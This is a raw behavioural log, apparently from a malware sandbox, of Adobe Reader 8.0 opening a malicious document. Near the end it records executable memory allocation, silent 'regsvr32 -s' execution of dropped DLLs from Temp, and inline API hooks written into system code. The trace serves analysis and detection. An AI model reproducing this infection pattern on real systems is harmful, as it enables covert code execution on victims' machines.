Section loaded Path: \KnownDlls\reflow.api Access: write and read and execute Type: unknown Baseaddress: 29A00000 Size: 122880 Protection: read write Mapped to pid: own pid object name not found 2514868047
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: query and write and read and execute Type: image Baseaddress: 28800000 Size: 385024 Protection: read write Mapped to pid: own pid success or wait 2514871951
Section loaded Path: \KnownDlls\SaveAsRTF.api Access: write and read and execute Type: unknown Baseaddress: 28800000 Size: 385024 Protection: read write Mapped to pid: own pid object name not found 2514986405
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: query and write and read and execute Type: image Baseaddress: 32000000 Size: 319488 Protection: read write Mapped to pid: own pid success or wait 2514996821
Section loaded Path: \KnownDlls\Search.api Access: write and read and execute Type: unknown Baseaddress: 32000000 Size: 319488 Protection: read write Mapped to pid: own pid object name not found 2515052245
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: query and write and read and execute Type: image Baseaddress: 2A300000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 2515057239
Section loaded Path: \KnownDlls\Search5.api Access: write and read and execute Type: unknown Baseaddress: 2A300000 Size: 372736 Protection: read write Mapped to pid: own pid object name not found 2515128647
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: query and write and read and execute Type: image Baseaddress: 2A000000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 2515132102
Section loaded Path: \KnownDlls\SendMail.api Access: write and read and execute Type: unknown Baseaddress: 2A000000 Size: 102400 Protection: read write Mapped to pid: own pid object name not found 2515173078
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: query and write and read and execute Type: image Baseaddress: 2A800000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2515176562
Section loaded Path: \KnownDlls\Spelling.api Access: write and read and execute Type: unknown Baseaddress: 2A800000 Size: 139264 Protection: read write Mapped to pid: own pid object name not found 2515227935
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: query and write and read and execute Type: image Baseaddress: 2B000000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2515233032
Section loaded Path: \KnownDlls\Updater.api Access: write and read and execute Type: unknown Baseaddress: 2B000000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2515284328
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: query and write and read and execute Type: image Baseaddress: 30800000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 2515288192
Section loaded Path: \KnownDlls\weblink.api Access: write and read and execute Type: unknown Baseaddress: 30800000 Size: 188416 Protection: read write Mapped to pid: own pid object name not found 2515340360
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: query and write and read and execute Type: image Baseaddress: 2E000000 Size: 196608 Protection: read write Mapped to pid: own pid success or wait 2515344302
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 2E000000 Size: 196608 Protection: read write Mapped to pid: own pid object name not found 2516418775
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2516420778
Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid object name not found 2517191753
Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 2517193665
Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 2517205542
Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 2517207442
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: write and read and execute Type: commit Baseaddress: 2DD0000 Size: 237568 Protection: execute Mapped to pid: own pid success or wait 2531505119
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 2531508638
Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 2531514374
Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2531516417
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2531521340
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid object name not found 2531578780
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2531580531
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2531586771
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2531588623
Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2531594768
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 2531596427
Section loaded Path: \KnownDlls\rtutils.dll Access: write and read and execute Type: unknown Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid object name not found 2531602933
Section loaded Path: C:\WINDOWS\system32\rtutils.dll Access: query and write and read and execute Type: image Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 2531604655
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 2DD0000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2531670107
Section loaded Path: \BaseNamedObjects\ASMWIN0 Access: query and write and read Type: commit Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2531836515
Section loaded Path: \BaseNamedObjects\ASMWIN1 Access: query and write and read Type: commit Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535740201
Section loaded Path: \BaseNamedObjects\ASMWIN2 Access: query and write and read Type: commit Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2539073786
Section loaded Path: \KnownDlls\AXE8SharedExpat.dll Access: write and read and execute Type: unknown Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 2542465211
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AXE8SharedExpat.dll Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2542468353
Section loaded Path: \KnownDlls\AXSLE.dll Access: write and read and execute Type: unknown Baseaddress: 10000000 Size: 184320 Protection: read write Mapped to pid: own pid object name not found 2542662189
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AXSLE.dll Access: query and write and read and execute Type: image Baseaddress: 2E10000 Size: 618496 Protection: read write Mapped to pid: own pid conflicting addresses 2542666927
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2EC0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2544126580
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2544191995
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 2544208657
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 2544210532
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 2EC0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2544271473
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2544284681
Section loaded Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: unknown Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid success or wait 2544290166
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid object name not found 2544367456
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2544369250
Section loaded Path: \KnownDlls\ATMLIB.dll Access: write and read and execute Type: unknown Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2551326135
Section loaded Path: C:\WINDOWS\system32\atmlib.dll Access: query and write and read and execute Type: image Baseaddress: 73C20000 Size: 45056 Protection: read write Mapped to pid: own pid success or wait 2551459941
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2552058525
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552121407
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552134802
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552148951
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552177879
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 212992 Protection: readonly Mapped to pid: own pid success or wait 2552187931
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 253952 Protection: readonly Mapped to pid: own pid success or wait 2552197579
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-It.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 253952 Protection: readonly Mapped to pid: own pid success or wait 2552207623
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Regular.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2552287131
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 98304 Protection: readonly Mapped to pid: own pid success or wait 2552297263
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 102400 Protection: readonly Mapped to pid: own pid success or wait 2552307240
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-It.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 102400 Protection: readonly Mapped to pid: own pid success or wait 2552317457
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 98304 Protection: readonly Mapped to pid: own pid success or wait 2552327445
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552339383
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2561989353
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll Access: write and read and execute Type: commit Baseaddress: 2EF0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2562143807
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll Access: query and write and read and execute Type: image Baseaddress: 4A800000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2562206204
Section loaded Path: \KnownDlls\icudt34.dll Access: write and read and execute Type: unknown Baseaddress: 4A800000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2562308962
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\icudt34.dll Access: query and write and read and execute Type: image Baseaddress: 4AD00000 Size: 90112 Protection: read write Mapped to pid: own pid success or wait 2562312532
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2562749060
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2562765658
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2562890526
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2563496414
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 2F00000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2563579568
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 2F00000 Size: 98304 Protection: readonly Mapped to pid: own pid success or wait 2563718778
Section loaded Path: unknown Access: query and write and read and execute Type: commit Baseaddress: 2FC0000 Size: 4096 Protection: execute and read and write Mapped to pid: own pid success or wait 2630294410
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 2FC00AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2630362338
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 7E1E0000 Size: 663552 Protection: read write Mapped to pid: own pid success or wait 2630379343
Section loaded Path: C:\WINDOWS\system32\urlmon.dll Access: read Type: commit Baseaddress: 111B0000 Size: 622592 Protection: readonly Mapped to pid: own pid success or wait 2630477257
Section loaded Path: \KnownDlls\mlang.dll Access: write and read and execute Type: unknown Baseaddress: 111B0000 Size: 622592 Protection: readonly Mapped to pid: own pid object name not found 2630709254
Section loaded Path: C:\WINDOWS\system32\mlang.dll Access: query and write and read and execute Type: image Baseaddress: 75CF0000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2630713598
Section loaded Path: C:\WINDOWS\system32\mlang.dll Access: read Type: commit Baseaddress: 111B0000 Size: 589824 Protection: readonly Mapped to pid: own pid success or wait 2630754558
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2630805363
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2630809953
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2630818639
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 111B0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2630876569
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631052844
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631063270
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_147456 Access: write Type: unknown Baseaddress: 4F90000 Size: 147456 Protection: read write Mapped to pid: own pid success or wait 2631064451
File opened Path: C:\Documents and Settings\Administrator\Cookies\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631074983
File opened Path: C:\Documents and Settings\Administrator\Cookies\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631085621
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 Access: write Type: unknown Baseaddress: 4FC0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2631086717
File opened Path: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631101333
File opened Path: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631117181
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 Access: write Type: unknown Baseaddress: 4FD0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2631118360
Section loaded Path: \KnownDlls\wsock32.dll Access: write and read and execute Type: unknown Baseaddress: 4FD0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2631354894
Section loaded Path: C:\WINDOWS\system32\wsock32.dll Access: query and write and read and execute Type: image Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2631360508
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2631622917
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2631624698
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 4FE0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2631759497
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2631765359
Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2632015715
Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2632044986
Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: 4FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2632133038
Section loaded Path: \BaseNamedObjects\UrlZonesSM_Administrator Access: query and write and read Type: commit Baseaddress: 4FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name exists 2632510755
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\J5ROTG8O\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2638860957
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\J5ROTG8O\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2638862308
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 4FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2638931525
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 115B0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2638941851
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2638976182
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2638983425
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2638988190
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2638990566
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2639103722
Process created PID: 1008 Path: C:\WINDOWS\system32\regsvr32.exe Cmdline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll Createflags: 0 success or wait 2639120696
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZLL6TAVD\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2659158011
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZLL6TAVD\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2659159364
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659163437
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 115B0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2659165437
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2659236056
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659246164
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2659248762
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659254199
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659261377
Process created PID: 1852 Path: C:\WINDOWS\system32\regsvr32.exe Cmdline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt1.dll Createflags: 0 success or wait 2659263840
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 116B0000 Length: 116AF8C8 Allocation Type: null Protection: page read and write success or wait 2664850798
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 116B0000 Length: 116AF8CC Allocation Type: null Protection: page read and write success or wait 2664851092
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2664861990
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Enabled object name not found 2664887634
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 success or wait 2664890438
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2664907158
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2664908163
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2664908766
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665006427
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665154541
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665156473
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665158536
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665159176
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665159910
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665160620
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665161333
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665161967
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0000 Length: 116AF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2665163090
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665164212
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2665164669
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 94 75 success or wait 2665199808
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 6C 89 success or wait 2665254914
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665255825
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665256940
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2665279259
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 95 75 success or wait 2665281828
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 5 Value: E9 09 1F 6C 89 success or wait 2665290587
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665290910
